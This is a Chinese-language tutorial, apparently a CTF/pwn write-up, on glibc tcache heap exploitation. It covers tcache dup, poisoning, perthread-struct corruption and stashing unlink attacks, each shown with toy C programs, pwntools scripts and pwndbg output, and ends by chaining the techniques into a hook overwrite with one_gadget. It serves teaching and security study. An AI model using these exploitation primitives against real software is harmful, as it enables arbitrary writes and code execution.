Ptmalloc算法：Tcache Attack

在 Glibc的2.26 中新增了Tcache机制，这是ptmalloc2的缓存机制

Tcache是 libc-2.26 之后引入的一种机制（类似于fastbin），而 Tcache Attack 则是针对 libc-2.26 及其后续版本的攻击

整体的攻击形式和fastbin类似

Tcache 源码

每条链上最多可以有7个chunk，free的时候优先放入tcache ，当tcache满了才放入fastbin，unsorted bin，malloc的时候优先去tcache找

Tcache使用两个新的数据结构，来管理Tcache中的bin：

typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS]; // counts:记录对应Tcache的bin中现有的bin数量
  tcache_entry *entries[TCACHE_MAX_BINS]; // entries(next):用来具体指向相应bin中的chunk块(相当于fastbin中的FD指针)
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

Tcache使用以下代码，来进行初始化：

static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct); //获得malloc需要的字节数

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes); //使用malloc为该结构分配内存
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim; //存放
      memset (tcache, 0, sizeof (tcache_perthread_struct));	//清零
    }
}

Tcache使用以下代码，来获取chunk：

  // 从 tcache list 中获取内存
  if (tc_idx < mp_.tcache_bins // 由 size 计算的 idx 在合法范围内
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL) // 该条 tcache 链不为空
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
  // 进入与无 tcache 时类似的流程
  if (SINGLE_THREAD_P)
    {
      victim = _int_malloc (&main_arena, bytes);
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
              &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

tcache_get：

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]); // 获得一个 chunk，counts 减一
  return (void *) e;
}

Tcache使用以下代码，把chunk送入Tcache bin：

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  ......
  ......
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache
        && tc_idx < mp_.tcache_bins // 64
        && tcache->counts[tc_idx] < mp_.tcache_count) // 7
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
  ......
  ......

tcache_put：（缺少检查，造成了一种类似于 Double free 的攻击技术：tcache dup）

/* 按照size对应的idx将已释放块挂进tcache bins链表中 */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx]; /* 将被释放块的malloc指针交给next成员变量 */
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Tcache使用以下代码，把chunk从Tcache bin中释放：

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
	&& tc_idx < mp_.tcache_bins
	&& tcache->counts[tc_idx] < mp_.tcache_count)
      {
	tcache_put (p, tc_idx);
	return;
      }
  }
#endif

Tcache 结构

类比：Tcachebin and Fastbin

fastbin chunk，smallbin chunk，unsortedbin chunk，这些 chunk 的FD指针都指向 nextchunk 的头，所以GDB中打印这些链表的时候，会显示各个chunk的首地址
tcachebin 的 next 指针与FD有所不同，它永远指向 nextchunk->next ，所以GDB中打印 tcachebin 的时候，会显示各个chunk的数据区

记住这一点，在劫持 tcache_perthread_struct->tcache_entry 的时候会省不少事

Tcache 顺序

内存释放

在 free 函数的最先处理部分，首先是检查释放块是否页对齐及前后堆块的释放情况，便优先放入 tcache 结构中

内存申请

申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中
申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中
当在 unsorted bin 链上循环处理时，当找到大小合适的链时，并不直接返回，而是先放到 tcache 中，继续处理
Tcachebin中的chunk不会分割

Tcache 利用

tcache leak

通常有两种leak：

unsortedbin leak 可以泄露“libc_base”
fastbin leak 可以泄露“heap_addr”

但是在 libc-2.27 出现 tcache 以后，释放的 chunk 先放入 tcachebin ，申请时也先从 tcache 中申请，为了把 free chunk 放入 unsortedbin 或者 fastbin（为了打上面这两种 leak），我们必须先把 tcachebin 填充满

tcache dup

类似于 Double free（上文已经提及过它的原理）

int main(){

	unsigned long* chunk=malloc(0x20);

	free(chunk);
	memset(chunk,0,0x20); // 高libc版本的程序会检查BK指针是否为NULL，所以提前置空
	free(chunk);
	
	return 0;
}

Free chunk (tcache) | PREV_INUSE
Addr: 0x555555559290
Size: 0x31
fd: 0x00

pwndbg> telescope 0x555555559290
00:0000│     0x555555559290 ◂— 0x0
01:0008│     0x555555559298 ◂— 0x31 /* '1' */
02:0010│ rsi 0x5555555592a0 ◂— 0x0
03:0018│     0x5555555592a8 —▸ 0x555555559010 ◂— 0x10000 /* 这个后面马上讲 */
    /* 第一个tcache的BK:永远指向tcache_perthread_struct+0x10(count的位置) */
    /* 这里也可以把tcache_perthread_struct当成一个chunk,第一个chunk永远指向它的next */
04:0020│     0x5555555592b0 ◂— 0x0

tcache poisoning

可以把它理解为 tcache 版本的 fastbin attack，这里的 next 指针其实相当于 fastbin 下的FD指针，而且没有很多的检查，将已经在 tcachebin 中的 chunk 的FD改写到目的地址，就可以malloc合适的size得到控制权

如果有修改模块直接写
没有修改模块可以用 Double free，tcache dup 重复申请
还可以用 unlink 实现 overlap 来写入目标地址

tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构，如果能控制这个结构体，那么无论我们 malloc 的 size 是多少，地址都是可控的

int main(){

	unsigned long* chunk1=malloc(0x10);
	unsigned long* chunk2=malloc(0x10);
	unsigned long* chunk3=malloc(0x10);
	unsigned long* chunk4=malloc(0x40);
	unsigned long* chunk5=malloc(0x50);
	unsigned long* chunk6=malloc(0x60);

	free(chunk1);
	free(chunk2);
	free(chunk3);
	free(chunk4);
	free(chunk5);
	free(chunk6);
	
	return 0;
}

GDB调试开启 tcache 的程序时，第一个chunk块就是 tcache_perthread_struct：

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x291

我们可以看一下它的内容：

pwndbg> x/20xg 0x555555559000
0x555555559000:	0x0000000000000000	0x0000000000000291
0x555555559010:	0x0000000000000000	0x0000000000000000 // count
0x555555559020:	0x0000000000000000	0x0000000000000000
0x555555559030:	0x0000000000000000	0x0000000000000000
0x555555559040:	0x0000000000000000	0x0000000000000000
0x555555559050:	0x0000000000000000	0x0000000000000000
0x555555559060:	0x0000000000000000	0x0000000000000000
0x555555559070:	0x0000000000000000	0x0000000000000000
0x555555559080:	0x0000000000000000	0x0000000000000000
0x555555559090:	0x0000000000000000	0x0000000000000000 // tcache_entry

tcache_perthread_struct->count ，每两字节对应相应大小 Tcachebin 中的chunk个数
tcache_perthread_struct->tcache_entry ，每一个指针对应相应大小 Tcachebin 中第一个堆块的入口地址（指向tcache->next）

程序执行完毕后：

pwndbg> x/20xg 0x555555559000
0x555555559000:	0x0000000000000000	0x0000000000000291
0x555555559010:	0x0001000000000003	0x0000000000010001 // count
0x555555559020:	0x0000000000000000	0x0000000000000000
0x555555559030:	0x0000000000000000	0x0000000000000000
0x555555559040:	0x0000000000000000	0x0000000000000000
0x555555559050:	0x0000000000000000	0x0000000000000000
0x555555559060:	0x0000000000000000	0x0000000000000000
0x555555559070:	0x0000000000000000	0x0000000000000000
0x555555559080:	0x0000000000000000	0x0000000000000000
0x555555559090:	0x00005555555592e0	0x0000000000000000 // tcache_entry
0x5555555590a0:	0x0000000000000000	0x0000555555559300
0x5555555590b0:	0x0000555555559350	0x00005555555593b0

12:0090│  0x555555559090 —▸ 0x5555555592e0 —▸ 0x5555555592c0 —▸ 0x5555555592a0 ◂— 0x0 // 这里可以看出"tachebin"和"fastbin" "smallbin"一样,采用"插头"的方法进入链表
13:0098│  0x555555559098 ◂— 0x0
14:00a0│  0x5555555590a0 ◂— 0x0
15:00a8│  0x5555555590a8 —▸ 0x555555559300 ◂— 0x0
16:00b0│  0x5555555590b0 —▸ 0x555555559350 ◂— 0x0
17:00b8│  0x5555555590b8 —▸ 0x5555555593b0 ◂— 0x0

注意：这是在 libc-2.31 中看到的数据，更高的 libc 版本可以会不同（以GDB看到的为准）

常见利用姿势：

一，针对“count”进行攻击：将 “sizeof(tcache_perthread_struct)” 大小对应的count设置为7，释放 tcache_perthread_struct 后，就会把整个 tcache_perthread_struct 放入 unsortedbin

这里我写了一个 tiny pwn 来加强理解，源码：

int main(){

	unsigned long* chunk=malloc(0x10);
	unsigned long* target=malloc(0x280);
	unsigned long* heap_addr=chunk-2-0x290/8;
	
	printf("heap_addr = 0x%x\n",heap_addr);
	
	free(target); // 为了暴露目标count的位置
	memset(heap_addr+2,0,72);
	read(0,heap_addr+2+9,0x400);
	
	free(heap_addr+2);
	return 0;
}

攻击脚本：

from pwn import*

p=process('./test')

gdb.attach(p)
p.sendline(p64(0x0007000000000000))
pause()

p.interactive()

打印“tcache_perthread_struct”

pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000:	0x0000000000000000	0x0000000000000291
0x5631b9f86010:	0x0000000000000000	0x0000000000000000
0x5631b9f86020:	0x0000000000000000	0x0000000000000000
0x5631b9f86030:	0x0000000000000000	0x0000000000000000
0x5631b9f86040:	0x0000000000000000	0x0000000000000000
0x5631b9f86050:	0x0000000000000000	0x0001000000000000 // 发现目标,尝试覆盖'1'为'7'
0x5631b9f86060:	0x0000000000000000	0x0000000000000000

这里的“72字节”偏移是一个比较固定的值，可以记住，当然也可以用我这种办法来查找“count”

pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000:	0x0000000000000000	0x0000000000000291
0x5631b9f86010:	0x0000000000000000	0x0000000000000000
0x5631b9f86020:	0x0000000000000000	0x0000000000000000
0x5631b9f86030:	0x0000000000000000	0x0000000000000000
0x5631b9f86040:	0x0000000000000000	0x0000000000000000
0x5631b9f86050:	0x0000000000000000	0x0007000000000000
0x5631b9f86060:	0x000000000000000a	0x0000000000000000

1 2	unsortedbin all: 0x5631b9f86000 —▸ 0x7f25cd8e1be0 (main_arena+96) ◂— 0x5631b9f86000

攻击效果：这种攻击可以创造 unsortedbin ，在限制了 size，无法获取 unsorted chunk 的程序中较为常见，后续可以 link libc_base，也可以覆盖地址打 house of roman

利用条件：条件只有一个 - 控制“tcache_perthread_struct”，

利用 Double free，tcache dup 重复申请“tcache_perthread_struct”，
用WAA，或者程序提供的输入，直接写“count”
通过 unlink 实现 overlap ，写入“tcache_perthread_struct”并申请（有现成的“size”）

二，针对“tcache_entry”进行攻击：这个就真的简单粗暴了，可以直接申请任意地址

这个 tiny pwn 就比较简单了，源码：

int main(){

	unsigned long* chunk=malloc(0x10);
	unsigned long* target=malloc(0x280);
	unsigned long* heap_addr=chunk-2-0x290/8;
	int fake_addr;
	
	printf("heap_addr = 0x%x\n",heap_addr);
	printf("fake_addr = 0x%x\n",&fake_addr);
	read(0,heap_addr+2,0x400);
	
	return 0;
}

攻击脚本：

from pwn import*

p=process('./test')
context.log_level='debug' # 开这个主要是看"fake_addr"对不对

gdb.attach(p)
p.recvuntil('fake_addr = ')
fake_addr=eval(p.recvuntil('\n')[:-1])
success('fake_addr >> '+hex(fake_addr))
p.send('\x00'*0x90+p64(fake_addr))
pause()

p.interactive()

1	[+] fake_addr >> 0xcf63319c

pwndbg> x/20xg 0x555940911000
0x555940911000:	0x0000000000000000	0x0000000000000291
0x555940911010:	0x0000000000000000	0x0000000000000000
0x555940911020:	0x0000000000000000	0x0000000000000000
0x555940911030:	0x0000000000000000	0x0000000000000000
0x555940911040:	0x0000000000000000	0x0000000000000000
0x555940911050:	0x0000000000000000	0x0000000000000000
0x555940911060:	0x0000000000000000	0x0000000000000000
0x555940911070:	0x0000000000000000	0x0000000000000000
0x555940911080:	0x0000000000000000	0x0000000000000000
0x555940911090:	0x0000000000000000	0x0000000000000000 // '0x20'的tcache
0x5559409110a0:	0x00000000cf63319c	0x0000000000000000 // '0x40'的tcache
0x5559409110b0:	0x0000000000000000	0x0000000000000000 // '0x60'的tcache

1 2	tcachebins 0x40 [ 0]: 0xcf63319c // fake_addr

常见利用过程：

先劫持“count”把整个“tcache_perthread_struct”放入unsortedbin
然后申请两个“0x48”来分割unsortedbin，使 main_arena 写入 '0x60' tcache
在 '0x40' tcache 处写入 '0x60' tcache addr （需要申请“0x48”才能做到）
申请“0x30”（实际位置为'0x60' tcache），覆盖低地址为 hook
申请“0x50”（实际位置为 hook），打入 one_gadget

关键在于：使 '0x40' tcache 中装有 '0x60' tcache addr ，使其可以通过申请“0x30”来修改 '0x60' tcache 的地址（劫持大小为“0x60”的tcachebin）

pwndbg> x/20xg 0x558b1cfcd000
0x558b1cfcd000:	0x0000000000000000	0x0000000000000051 // 申请"0x48"
0x558b1cfcd010:	0x0001000200000000	0x0000000000000001
0x558b1cfcd020:	0x0000000000000000	0x0000000000000000
0x558b1cfcd030:	0x0000000000000000	0x0000000000000000
0x558b1cfcd040:	0x0000000000000000	0x0000000000000000
0x558b1cfcd050:	0x0000000000000000	0x0000000000000051 // 申请"0x48"
0x558b1cfcd060:	0x0000000558b1ce3c	0x0000558b1cfcd010 // 释放第二个"0x40"
0x558b1cfcd070:	0x0000000000000000	0x0000000000000000
0x558b1cfcd080:	0x0000000000000000	0x0000000000000000
0x558b1cfcd090:	0x0000000000000000	0x0000000000000000
0x558b1cfcd0a0:	0x0000558b1cfcd0b0	0x0000558b1cfcd060 // '0x40'的tcache
    		/* 伪造'0x40'的tcache(带有main_arena) */ 
0x558b1cfcd0b0:	0x00007fea097ddc00	0x00007fea097ddc00 // '0x60'的tcache
    		/* 这里曾经是unsortedbin,所以main_arena留下来了 */

tcache stashing unlink attack

很多时候常常把 tcache stashing unlink attack 和 tcache stashing unlink attack+ 称为同一种技术，但它们的功能不同

具体的利用方式如下：

tcachebin[A] 为空
smallbin[A] 有 8 个
修改第 8 个 smallbin chunk 的 bk 为 addr
分配 malloc(A) 的时候，addr+0x10 会被写一个 libc 地址

tcache stashing unlink attack+

这种攻击利用的是 tcache bin 中有剩余（数量小于 TCACHE_MAX_BINS）时，同大小的 small bin 会放进 tcache 中（这种情况可以使用 calloc 分配同大小堆块触发，因为 calloc 分配堆块时不从tcache bin 中选取）

在获取到一个 smallbin 中的一个 chunk 后，如果 tcache 任由足够空闲位置，会将剩余的 smallbin 挂进 tcache 中，在这个过程中只对第一个 bin 进行了完整性检查，后面的堆块的检查缺失

当攻击者可以修改一个 small bin 的 bk 时，就可以实现在任意地址上写一个 libc 地址

具体有两种伪造方法：

第一种，适用于没有 calloc：
- tcachebin[A] 为空
- smallbin[A] 有 8 个
- 修改第 7 个 smallbin chunk 的 bk 为 addr，还要保证 addr+0x18 是一个合法可写的地址
- 分配 malloc(A) 的时候，addr 会被链入到 tcachebin，也就是可以分配到 addr 处
第二种，适用于有 calloc 但限制了申请次数：
- tcachebin[A] 不为满（如果程序中存在 malloc，则可以忽略此条件）
- smallbin[A] 有 2 个
- 修改第 2 个 smallbin chunk 的 bk 为 addr，还要保证 addr+0x18 是一个合法可写的地址
- 分配 calloc(A) 的时候，addr 会被链入到 tcachebin，也就是可以分配到 addr 处

测试案例：

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    setbuf(stdout, NULL);
    
    printf("stack_var addr is:%p\n",&stack_var[0]);
    printf("chunk_lis addr is:%p\n",&chunk_lis[0]);
    printf("target addr is:%p\n",(void*)target);

    stack_var[3] = (unsigned long)(&stack_var[2]);

    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }
    
    free(chunk_lis[1]);
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    malloc(0xa0);
    malloc(0x90);
    malloc(0x90);
    
    chunk_lis[2][1] = (unsigned long)stack_var;
    calloc(1,0x90);

    target = malloc(0x90);

    printf("target now: %p\n",(void*)target);

    assert(target == &stack_var[2]);
    return 0;
}

刚刚释放掉9个 chunk 后：

tcachebins
0xa0 [  7]: 0x1b0f340 —▸ 0x1b0f7a0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2be0 (main_arena+96) ◂— 0x1b0f3d0

前7个进入 tcache，后2个进入 unsortedbin

重新申请回2个 chunk 后：

tcachebins
0xa0 [  5]: 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2c70 (main_arena+240) ◂— 0x1b0f3d0

malloc(0xa0) 只是为了使 unsorted chunk 进入 smallbin

写入 stack_var 并调用 calloc 申请了一次 small chunk 后：

tcachebins
0xa0 [  7]: 0x7ffc97e66030 —▸ 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x1b0f3d0 —▸ 0x1b0f700 ◂— 0x0
BK: 0x7ffc97e66030 ◂— 0x0

由于修改了 small chunk->bk 为 stack_var，导致程序把 stack_var 给放入了 tcachebin 中
tcachebin 采用“插头拿尾”，因此程序会借助 chunk->bk 来识别将会被放入 tcachebin 的 chunk

最后一个 malloc 用于申请 stack_var：

1 2	tcachebins 0xa0 [ 6]: 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0